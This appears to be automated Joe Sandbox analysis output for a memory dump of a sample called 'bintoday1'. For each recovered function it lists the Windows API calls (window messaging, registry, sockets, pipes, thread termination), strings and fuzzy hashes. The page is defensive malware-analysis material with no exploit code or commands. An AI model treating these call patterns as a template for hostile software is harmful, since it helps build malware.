Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: ffaad991d683698554700487c1e5709b6f0607e2b3bd86c659856e60f81a3b72
Instruction ID: 2d220250545192251878ee6edd536edd69abe22b35ede4926d4c29ab27a89e6d
Opcode Fuzzy Hash: ffaad991d683698554700487c1e5709b6f0607e2b3bd86c659856e60f81a3b72
Instruction Fuzzy Hash: EE41247194521D5FDF12EBA4CA81AFDB7F9EF08340F1000E6E605E7151EA34A68DCB50

Function 00C22DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C22E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00C22E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00C22E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C22EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C22EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00C22EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C22F0B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: a98a00ba94b1538486a5dbf820e27ce0612489b2559688bd0a7a9502342aceca
Instruction ID: f1118e5641dcce325a5a75291df76183e5021317bbed51a2e4dba01ed74376a8
Opcode Fuzzy Hash: a98a00ba94b1538486a5dbf820e27ce0612489b2559688bd0a7a9502342aceca
Instruction Fuzzy Hash: D1310730614160AFDB21CF59EC84F6937E1EB5A722F1A0164F9118F6B1CBB1AD41EF41

Function 00BF7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BF7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BF778F
SysAllocString.OLEAUT32(00000000), ref: 00BF7792
SysAllocString.OLEAUT32(?), ref: 00BF77B0
SysFreeString.OLEAUT32(?), ref: 00BF77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 00BF77DE
SysAllocString.OLEAUT32(?), ref: 00BF77EC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 45c36fa36971dc17b5399224d05825cfe854f223a3049505d0db1f03f6b52856
Instruction ID: c3922882b0ca5ce88b7d1b96933c99775a2ced329b8961344bd48b9441117721
Opcode Fuzzy Hash: 45c36fa36971dc17b5399224d05825cfe854f223a3049505d0db1f03f6b52856
Instruction Fuzzy Hash: 9D219176618219AFDB10AFA8CC88EFF73ECEB0936471080A5FA04DB150DA709C458BA0

Function 00BF77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BF7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BF7868
SysAllocString.OLEAUT32(00000000), ref: 00BF786B
SysAllocString.OLEAUT32 ref: 00BF788C
SysFreeString.OLEAUT32 ref: 00BF7895
StringFromGUID2.OLE32(?,?,00000028), ref: 00BF78AF
SysAllocString.OLEAUT32(?), ref: 00BF78BD

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 30e577f3e6fda12dacb77183b64f1ff6641ea28add88d30803b863bbc77a6829
Instruction ID: 58c91919384e973fe2bf8cff9d260b6b4512c1dd3cdae6c1157fd3c7838a197b
Opcode Fuzzy Hash: 30e577f3e6fda12dacb77183b64f1ff6641ea28add88d30803b863bbc77a6829
Instruction Fuzzy Hash: A2216531608108AFDB10AFA9DCCDEBE77ECEB0976071081A5FA15CB1A1DA74DC45CB64

Function 00C004D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C004F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C0052E

Strings

nul, xrefs: 00C00567

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 064882ea09933d741811e3ef71521292f1c4084cfaa7d9ddd556bc07f4d9cd06
Instruction ID: bf3e6ad87fbd92a36479ad3ae5ff3254335337130461569c6582c78341eb7e86
Opcode Fuzzy Hash: 064882ea09933d741811e3ef71521292f1c4084cfaa7d9ddd556bc07f4d9cd06
Instruction Fuzzy Hash: A4218975600305ABDB208F29DC45B9E7BB4AF44724F314A29F8B1E72E0E7709A41CF24

Function 00C005A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C005C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C00601

Strings

nul, xrefs: 00C00639

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 3cdd04386e2fdad167e18e7f1157dbe1e6f34608445506c717cafe2157527c12
Instruction ID: 41a15f8a8f4f3ddf9d00e87a60eb565b2d2ec045bb2ed22ee3a49f058193bb32
Opcode Fuzzy Hash: 3cdd04386e2fdad167e18e7f1157dbe1e6f34608445506c717cafe2157527c12
Instruction Fuzzy Hash: 93219C35500305DBDB208F699C44B9E77A9AF85721F310A19FCB1E32E0DBB19A61CB20

Function 00C240AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B9604C
Part of subcall function 00B9600E: GetStockObject.GDI32(00000011), ref: 00B96060
Part of subcall function 00B9600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B9606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C24112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C2411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C2412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C24139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C24145

Strings

Msctls_Progress32, xrefs: 00C240E3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 8af7d1786a8d3aa6fe6c945260deb022558baba4288ca64b1a0d1ba3833df837
Instruction ID: 755df8cea8ec303fd693ce208237bb67282974b989ac53a50980b5fd87621127
Opcode Fuzzy Hash: 8af7d1786a8d3aa6fe6c945260deb022558baba4288ca64b1a0d1ba3833df837
Instruction Fuzzy Hash: 6411B6B11502297FEF218F64DC85EEB7F5DEF09798F014110FA18A2090C7729C61DBA4

Function 00BCD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BCD7A3: _free.LIBCMT ref: 00BCD7CC

_free.LIBCMT ref: 00BCD82D

Part of subcall function 00BC29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000), ref: 00BC29DE
Part of subcall function 00BC29C8: GetLastError.KERNEL32(00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000,00000000), ref: 00BC29F0

_free.LIBCMT ref: 00BCD838
_free.LIBCMT ref: 00BCD843
_free.LIBCMT ref: 00BCD897
_free.LIBCMT ref: 00BCD8A2
_free.LIBCMT ref: 00BCD8AD
_free.LIBCMT ref: 00BCD8B8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: ee21a4db04849bb884b43d00282d0704cdb3e9cd92275e43dac9d32a70570e54
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: E6112E75640B04AAD621BFB0CC47FCB7BDCAF04700F40587EB29DA6992DA75B9058660

Function 00BFDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BFDA74
LoadStringW.USER32(00000000), ref: 00BFDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BFDA91
LoadStringW.USER32(00000000), ref: 00BFDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BFDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00BFDAB9

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: e3c37b718f3c327c836ad7cf4b7f09d9ee9e473bdfc34aec08adf9a7e9752026
Instruction ID: b823ba0f75378217d343907cbd64bfbd5b24df155e43f8c9fa85a4a2d50f782a
Opcode Fuzzy Hash: e3c37b718f3c327c836ad7cf4b7f09d9ee9e473bdfc34aec08adf9a7e9752026
Instruction Fuzzy Hash: 2E0162F65002087FE7109BA49DC9FFF326CEB08701F4004A6B706E2041EA749E854F74

Function 00C0096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00FAEAC0,00FAEAC0), ref: 00C0097B
EnterCriticalSection.KERNEL32(00FAEAA0,00000000), ref: 00C0098D
TerminateThread.KERNEL32(00FA9C10,000001F6), ref: 00C0099B
WaitForSingleObject.KERNEL32(00FA9C10,000003E8), ref: 00C009A9
CloseHandle.KERNEL32(00FA9C10), ref: 00C009B8
InterlockedExchange.KERNEL32(00FAEAC0,000001F6), ref: 00C009C8
LeaveCriticalSection.KERNEL32(00FAEAA0), ref: 00C009CF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: a46f6440fdddd6191287ee63341d11ef9ba5ce9c9c00f9357ed8730354aaf81a
Instruction ID: eaf20f2f5ea8a6fc0de0361839271467a05f6e87f0327043466275ef98f8e670
Opcode Fuzzy Hash: a46f6440fdddd6191287ee63341d11ef9ba5ce9c9c00f9357ed8730354aaf81a
Instruction Fuzzy Hash: FCF01D31452902EBD7615B94EEC9BDE7A25BF01702F501015F10150CA1CB749576CF90

Function 00C11C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C11DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C11DE1
WSAGetLastError.WSOCK32 ref: 00C11DF2
htons.WSOCK32(?,?,?,?,?), ref: 00C11EDB
inet_ntoa.WSOCK32(?), ref: 00C11E8C

Part of subcall function 00BF39E8: _strlen.LIBCMT ref: 00BF39F2

Part of subcall function 00C13224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C0EC0C), ref: 00C13240

_strlen.LIBCMT ref: 00C11F35

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 00be0da11cad87e86160a41ad8bf378f157a6883dd96bce84744d444bd2e3d41
Instruction ID: fbd57037166f0d59859a6f86f84e2f2b44a3cccac8401af45466f4e3854af844
Opcode Fuzzy Hash: 00be0da11cad87e86160a41ad8bf378f157a6883dd96bce84744d444bd2e3d41
Instruction Fuzzy Hash: B1B12931104340AFC724DF64C895F6A77E5AF86318F58859CF9664B2E2CB31EE86CB91

Function 00B95D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00B95D30
GetWindowRect.USER32(?,?), ref: 00B95D71
ScreenToClient.USER32(?,?), ref: 00B95D99
GetClientRect.USER32(?,?), ref: 00B95ED7
GetWindowRect.USER32(?,?), ref: 00B95EF8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 900bf379277dca205fa54074bbdb8a370b8b3010313ba279577d7981a555dc20
Instruction ID: dce414ac288cb92e99739109736439724624a13c9c62bc562dbe66fc36cecb3b
Opcode Fuzzy Hash: 900bf379277dca205fa54074bbdb8a370b8b3010313ba279577d7981a555dc20
Instruction Fuzzy Hash: 02B16D35A00A4ADBDF24CFA9C4807EEB7F1FF48310F14846AE8A9D7250E734AA51DB50

Function 00BC01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00BC00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BC00D6
__allrem.LIBCMT ref: 00BC00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BC010B
__allrem.LIBCMT ref: 00BC0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BC0140

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 5d51b83895bbd1a40ddc650a86e1b8ea11c823ef1893808d86209ed3800c8ebe
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: FC81C671601706DBE724AF68CC82FBAB3E9EF41764F2445BEF551D6681E7B0D9008750

Function 00BC61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BB82D9,00BB82D9,?,?,?,00BC644F,00000001,00000001,8BE85006), ref: 00BC6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BC644F,00000001,00000001,8BE85006,?,?,?), ref: 00BC62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BC63D8
__freea.LIBCMT ref: 00BC63E5

Part of subcall function 00BC3820: RtlAllocateHeap.NTDLL(00000000,?,00C61444,?,00BAFDF5,?,?,00B9A976,00000010,00C61440,00B913FC,?,00B913C6,?,00B91129), ref: 00BC3852

__freea.LIBCMT ref: 00BC63EE
__freea.LIBCMT ref: 00BC6413

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 7953302a6447ea6dff072e5677bcaf5d0b7bb548a213b02c5fcd8c6b41b69db7
Instruction ID: 59ff2982ec3c3ee37bc1081259fc0653cf5ea3a26ea6655c1c903561935501f1
Opcode Fuzzy Hash: 7953302a6447ea6dff072e5677bcaf5d0b7bb548a213b02c5fcd8c6b41b69db7
Instruction Fuzzy Hash: 8651AF72A10256ABEB258F68CC81FAF77E9EF84750F1546ADFC05DA181EB34DC40C664

Function 00C1BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00C1C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C1B6AE,?,?), ref: 00C1C9B5
Part of subcall function 00C1C998: _wcslen.LIBCMT ref: 00C1C9F1
Part of subcall function 00C1C998: _wcslen.LIBCMT ref: 00C1CA68
Part of subcall function 00C1C998: _wcslen.LIBCMT ref: 00C1CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C1BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C1BD25
RegCloseKey.ADVAPI32(00000000), ref: 00C1BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C1BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C1BDF3
RegCloseKey.ADVAPI32(?), ref: 00C1BDFF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: d39cbc49924c0a54b064976ee6963c2e89ecd50c9b5eea5aefcbc5101b1105bf
Instruction ID: ba10ba7e1b8488c9148e9b7da0d27ec692efccf02029ce2d55e16dc6f7408a8a
Opcode Fuzzy Hash: d39cbc49924c0a54b064976ee6963c2e89ecd50c9b5eea5aefcbc5101b1105bf
Instruction Fuzzy Hash: A6815D30218241AFD714DF24C895E6ABBE5FF85308F1485ACF4554B2A2DB31ED45DF92

Function 00BEF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00BEF7B9
SysAllocString.OLEAUT32(00000001), ref: 00BEF860
VariantCopy.OLEAUT32(00BEFA64,00000000), ref: 00BEF889
VariantClear.OLEAUT32(00BEFA64), ref: 00BEF8AD
VariantCopy.OLEAUT32(00BEFA64,00000000), ref: 00BEF8B1
VariantClear.OLEAUT32(?), ref: 00BEF8BB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: b4fe2e58b4e7d051ae9ef56b6ee5c30ef6e0a80958ae4606dc3e361a45bd77dd
